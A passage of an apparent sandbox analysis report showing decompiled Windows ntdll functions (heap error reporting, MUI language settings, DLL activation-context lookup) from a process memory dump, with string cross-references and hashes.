						E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0522B150("Parameter3: %p\n",  *0x53158ac);
				}
				_t119 =  *0x53158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0522B150();
					} else {
						E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x53158b4);
					E0522B150("Last known valid blocks: before - %p, after - %p\n",  *0x53158b0);
				} else {
					_t120 =  *0x53158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0522B150();
				} else {
					E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0522B150("Stack trace available at %p\n", 0x53158c0);
			}

0x052e1c10
0x052e1c16
0x052e1c1e
0x052e1c3d
0x052e1c3e
0x052e1c20
0x052e1c35
0x052e1c3a
0x052e1c44
0x052e1c55
0x052e1c5a
0x052e1c65
0x052e1c67
0x00000000
0x052e1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x052e1c67
0x052e1cdc
0x052e1ce5
0x052e1d04
0x052e1d05
0x052e1ce7
0x052e1cfc
0x052e1d01
0x052e1d0b
0x052e1d17
0x052e1d1f
0x052e1d25
0x052e1d30
0x052e1d4f
0x052e1d50
0x052e1d32
0x052e1d47
0x052e1d4c
0x052e1d61
0x052e1d67
0x052e1d68
0x052e1d6e
0x052e1d79
0x052e1d98
0x052e1d99
0x052e1d7b
0x052e1d90
0x052e1d95
0x052e1daa
0x052e1db0
0x052e1db1
0x052e1db7
0x052e1dc2
0x052e1de1
0x052e1de2
0x052e1dc4
0x052e1dd9
0x052e1dde
0x052e1df3
0x052e1df9
0x052e1dfa
0x052e1e00
0x052e1e0a
0x052e1e13
0x052e1e32
0x052e1e33
0x052e1e15
0x052e1e2a
0x052e1e2f
0x052e1e39
0x052e1e4a
0x052e1e02
0x052e1e02
0x052e1e08
0x00000000
0x00000000
0x052e1e08
0x052e1e5b
0x052e1e7a
0x052e1e7b
0x052e1e5d
0x052e1e72
0x052e1e77
0x052e1e95

Strings

heap_failure_buffer_overrun, xrefs: 052E1C98
heap_failure_internal, xrefs: 052E1C6E
Heap error detected at %p (heap handle %p), xrefs: 052E1C50
heap_failure_cross_heap_operation, xrefs: 052E1CC2
Stack trace available at %p, xrefs: 052E1E86
Last known valid blocks: before - %p, after - %p, xrefs: 052E1E45
heap_failure_usage_after_free, xrefs: 052E1CBB
heap_failure_virtual_block_corruption, xrefs: 052E1C91
HEAP[%wZ]: , xrefs: 052E1C30, 052E1CF7, 052E1D42, 052E1D8B, 052E1DD4, 052E1E25, 052E1E6D
heap_failure_invalid_argument, xrefs: 052E1CAD
heap_failure_multiple_entries_corruption, xrefs: 052E1C8A
Parameter2: %p, xrefs: 052E1DA5
heap_failure_generic, xrefs: 052E1C7C
Parameter3: %p, xrefs: 052E1DEE
heap_failure_buffer_underrun, xrefs: 052E1C9F
HEAP: , xrefs: 052E1C16, 052E1C3D, 052E1D04, 052E1D4F, 052E1D98, 052E1DE1, 052E1E32, 052E1E7A
heap_failure_listentry_corruption, xrefs: 052E1CD0
heap_failure_block_not_busy, xrefs: 052E1CA6
Error code: %d - %s, xrefs: 052E1D12
heap_failure_entry_corruption, xrefs: 052E1C83
heap_failure_invalid_allocation_type, xrefs: 052E1CB4
Parameter1: %p, xrefs: 052E1D5C
heap_failure_lfh_bitmap_mismatch, xrefs: 052E1CD7
heap_failure_unknown, xrefs: 052E1C75
heap_failure_freelists_corruption, xrefs: 052E1CC9

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e586ec52262e9c20150adac2c5b482d2ffe6514b1cf596d8aa0264cd921b8e90
Instruction ID: 07126effa26fb92b035bdbf3700c53f82580130750cdbd39cacdbc31ca111658
Opcode Fuzzy Hash: e586ec52262e9c20150adac2c5b482d2ffe6514b1cf596d8aa0264cd921b8e90
Instruction Fuzzy Hash: E461B937635555EFC211DB95D849E2677F9EF04A30B8A8079FC0E6B241CAB4A860CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 05233D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E05233D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E05231B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E05231B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E05231B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E05231B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E05231B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L05244620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0526F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05271370(_t276, 0x5204e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0526BB40(0,  &_v68, _t170);
									if(L052343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0526BB40(_t257,  &_v68, _t243);
								if(L052343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05271370(_t278, 0x5204e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L05244620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0526F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05271370(_v16, 0x5204e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0526BB40(_t262,  &_v68, _t244);
								if(L052343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05271370(_t282, 0x5204e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0526BB40(_t262,  &_v68, _t201);
							if(L052343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L05244620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0526F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05271370(_t280, 0x5204e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0526BB40(_t267,  &_v68, _t245);
							if(L052343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05271370(_t284, 0x5204e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0526BB40(_t267,  &_v68, _t224);
						if(L052343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x05233d3c
0x05233d42
0x05233d44
0x05233d46
0x05233d49
0x05233d4c
0x05233d4f
0x05233d52
0x05233d55
0x05233d58
0x05233d5b
0x05233d5f
0x05233d61
0x05233d66
0x05288213
0x05288218
0x05234085
0x05234088
0x0523408e
0x05234094
0x0523409a
0x052340a0
0x052340a6
0x052340a9
0x052340af
0x052340b6
0x052340bd
0x052340bd
0x05233d83
0x0528821f
0x05288229
0x05288238
0x05288238
0x0528823d
0x0528823d
0x05233da0
0x05233daf
0x05233db5
0x05233dba
0x05233dba
0x05233dd4
0x05233e94
0x05233eab
0x05233f6d
0x05233f84
0x0523406b
0x0523406b
0x0523406e
0x0523406e
0x05234070
0x05234074
0x05288351
0x05288351
0x0523407a
0x0523407f
0x0528835d
0x05288370
0x05288377
0x05288379
0x0528837c
0x0528837c
0x0528835d
0x00000000
0x0523407f
0x05233f8a
0x05233f8d
0x05233f90
0x05233f95
0x0528830d
0x0528830f
0x05233f9b
0x05233fac
0x05233fae
0x05233fb1
0x05233fb1
0x05233fb6
0x05288317
0x0528831a
0x00000000
0x05233fbc
0x05233fc1
0x05233fc9
0x05233fd7
0x05233fda
0x05233fdd
0x05234021
0x05234021
0x05234029
0x05234030
0x05234044
0x05234046
0x05234046
0x05234044
0x05234049
0x05288327
0x05288334
0x05288339
0x0528833c
0x0523404f
0x0523404f
0x0523404f
0x05234051
0x05234056
0x05234063
0x05234063
0x05234068
0x00000000
0x05234068
0x05233fdf
0x05233fe2
0x05233fe4
0x05233fe7
0x05233fef
0x05234003
0x05234005
0x05234005
0x0523400c
0x05234013
0x05234016
0x05234017
0x0523401b
0x0523401e
0x00000000
0x0523401e
0x05233fb6
0x05233eb1
0x05233eb4
0x05233eb7
0x05233ebc
0x052882a9
0x052882ab
0x05233ec2
0x05233ed3
0x05233ed5
0x05233ed8
0x05233ed8
0x05233edd
0x052882b3
0x052882b6
0x00000000
0x05233ee3
0x05233ee8
0x05233eed
0x05233ef0
0x05233ef3
0x05233f02
0x05233f05
0x05233f08
0x052882c0
0x052882c3
0x052882c5
0x052882c8
0x052882d0
0x052882e4
0x052882e6
0x052882e6
0x052882ed
0x052882f4
0x052882f7
0x052882f8
0x052882fc
0x052882ff
0x052882ff
0x05233f0e
0x05233f11
0x05233f16
0x05233f1d
0x05233f31
0x05288307
0x05288307
0x05233f31
0x05233f39
0x05233f48
0x05233f4d
0x05233f50
0x05233f50
0x05233f53
0x05233f58
0x05233f65
0x05233f65
0x05233f6a
0x00000000
0x05233f6a
0x05233edd
0x05233dda
0x05233ddd
0x05233de0
0x05233de5
0x05288245
0x05233deb
0x05233df7
0x05233dfc
0x05233dfe
0x05233e01
0x05233e01
0x05233e06
0x0528824d
0x0528824f
0x05288254
0x00000000
0x05233e0c
0x05233e11
0x05233e16
0x05233e19
0x05233e29
0x05233e2c
0x05233e2f
0x0528825c
0x0528825f
0x05288261
0x05288264
0x0528826c
0x05288280
0x05288282
0x05288282
0x05288289
0x05288290
0x05288293
0x05288294
0x05288298
0x0528829b
0x0528829b
0x05233e35
0x05233e38
0x05233e3d
0x05233e44
0x05233e58
0x052882a3
0x052882a3
0x05233e58
0x05233e60
0x05233e6f
0x05233e74
0x05233e77
0x05233e77
0x05233e7a
0x05233e7f
0x05233e8c
0x05233e8c
0x05233e91
0x00000000
0x05233e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 05233D8C
Kernel-MUI-Language-Disallowed, xrefs: 05233E97
WindowsExcludedProcs, xrefs: 05233D6F
Kernel-MUI-Language-Allowed, xrefs: 05233DC0
Kernel-MUI-Language-SKU, xrefs: 05233F70

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 21187c6246e58306b3fe00c62e4037bcb5fbe21ce67b3b9b1bb35379e2244ff9
Instruction ID: e154fbb4d76b2326173f4769c8de8e70e6c93184d9e31542170cb52864f28b66
Opcode Fuzzy Hash: 21187c6246e58306b3fe00c62e4037bcb5fbe21ce67b3b9b1bb35379e2244ff9
Instruction Fuzzy Hash: 6FF16CB2E21259EFCF15EF98C984EEEBBB9FF08650F14445AE905A7250D7709E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05258E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05258E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x531d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5318464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5315780 & 0x00000003) != 0) {
							E052A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5315780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0526B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5317984; // 0x1143e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5318464; // 0x74790110
					 *0x531b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E05259B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5315780 & 0x00000005) != 0) {
						_push(_t49);
						E052A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x05258e0f
0x05258e16
0x05258e19
0x05258e1b
0x05258e21
0x05258e7f
0x05258e85
0x05299354
0x0529936c
0x05299371
0x0529937b
0x05299381
0x05299381
0x0529937b
0x05258e9d
0x05258e9d
0x05258e29
0x05258e2c
0x05258e38
0x05258e3e
0x05258e43
0x05258eb5
0x05258eb9
0x052992aa
0x052992af
0x052992e8
0x052992e8
0x052992af
0x05258eb9
0x05258e45
0x05258e53
0x05258e5b
0x05258e5f
0x05258e78
0x05258e78
0x05258e7d
0x05258ec3
0x05258ecd
0x05258ed2
0x05258ed2
0x05258ec5
0x05258ec5
0x00000000
0x05258e7d
0x05258e67
0x05258ea4
0x0529931a
0x00000000
0x00000000
0x05299320
0x05258ea4
0x05258e70
0x05299325
0x05299340
0x05299345
0x05299345
0x05258e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0529933B, 05299367
LdrpFindDllActivationContext, xrefs: 05299331, 0529935D
Querying the active activation context failed with status 0x%08lx, xrefs: 05299357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0529932A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: b378a7065be0500cad31e7aaf4de714bdec94f869f4d4970b1064a48667231a0
Instruction ID: 81e09fdecec7c3d409a96d512cbe4802bb827c351fa5de4897f5005d3f181f56
Opcode Fuzzy Hash: b378a7065be0500cad31e7aaf4de714bdec94f869f4d4970b1064a48667231a0
Instruction Fuzzy Hash: 4C410832A343169FDF25AA148889E35B7BABF04774F164539FD0D9B191EBF06CC08681

Uniqueness

Uniqueness Score: -1.00%

Function 05238794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E05238794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0523934A() != 0) {
								_t159 = E052AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5315780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E052A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5315780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0523849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E05238999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E05238999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5315c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5315c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E05242280(_t92, 0x53186cc);
															_t94 = E052F9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E052561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5315c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E05238A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5315c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5315c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0526F380(_t136, 0x5201184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E05242280(_t108, 0x53186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E052561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E052F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0523FFB0(_t118, _t156, 0x53186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
